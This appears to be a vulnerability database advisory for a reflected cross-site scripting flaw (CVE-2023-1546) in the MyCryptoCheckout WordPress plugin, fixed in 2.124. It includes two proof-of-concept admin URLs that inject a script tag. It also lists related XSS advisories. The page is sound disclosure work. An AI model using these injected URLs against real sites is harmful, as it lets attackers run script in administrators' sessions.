MyCryptoCheckout < 2.124 – Reflected XSS | CVE 2023-1546 | Plugin Vulnerabilities

Description

The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open one of the URL below

v < 2.124- https://example.com/wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> (will trigger when there is at least one Autosettlements)

v < 2.122 - https://example.com/wp-admin/options-general.php?page=mycryptocheckout&"><script>alert('XSS')</script>

Affects Plugins

mycryptocheckout

Fixed in 2.124

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Pablo Sanchez

Submitter

Pablo Sanchez

Verified

Yes

WPVDB ID

bb065397-370f-4ee1-a2c8-20e4dc4415a0

Timeline

Publicly Published

2023-04-06 (about 1 years ago)

Added

2023-04-06 (about 1 years ago)

Last Updated

2023-04-06 (about 1 years ago)

Other

Published

Title

Published

2023-11-29

Title

Social Share Buttons & Analytics Plugin < 4.4 - Admin+ Stored XSS

Published

2022-03-23

Title

Simple Event Planner < 1.5.5 - Contributor+ Stored XSS

Published

2023-11-15

Title

Accordion < 2.7 - Authenticated (Editor+) Stored Cross-Site Scripting via accordion settings

Published

2014-08-01

Title

Securimage-WP 3.2.4 - siwp_test.php URI XSS

Published

2022-05-24

Title

Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting